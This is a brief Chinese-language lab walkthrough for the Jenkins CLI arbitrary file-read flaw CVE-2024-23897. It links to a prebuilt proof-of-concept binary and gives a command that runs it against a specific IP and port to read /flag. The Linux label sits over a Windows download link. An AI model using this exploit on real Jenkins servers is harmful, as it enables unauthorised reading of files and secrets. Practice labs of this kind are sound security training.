一、靶场介绍
Jenkins 2.441及更早版本,以及LTS 2.426.2及更早版本没有禁用其CLI命令解析器的一个功能,该功能会将参数中'@'字符后跟的文件路径替换为该文件的内容,允许未经身份验证的攻击者读取Jenkins控制器文件系统上的任意文件。
二、POC下载
.直接下载编译好的二进制文件
Linux:
https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_windows_amd64.zip
其他系统Release:
https://github.com/wjlin0/CVE-2024-23897/releases/tag/v1.0.1
获取flag
CVE-2024-23897.exe -u http://39.106.48.123:41922/ -a /flag